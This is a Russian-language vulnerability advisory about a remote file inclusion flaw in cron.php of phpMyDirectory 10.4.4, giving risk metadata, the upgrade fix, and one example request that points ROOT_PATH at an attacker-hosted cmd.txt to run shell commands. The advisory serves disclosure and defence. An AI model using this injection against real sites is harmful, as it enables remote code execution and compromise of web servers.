PHP-инклюдинг в phpMyDirectory

Дата публикации:
24.05.2006
Дата изменения:
24.03.2009
Всего просмотров:
1221
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpMyDirectory 10.x
Уязвимые версии: phpMyDirectory 10.4.4, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "ROOT_PATH" в сценарии cron.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls

URL производителя: www.phpmydirectory.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability

или введите имя

CAPTCHA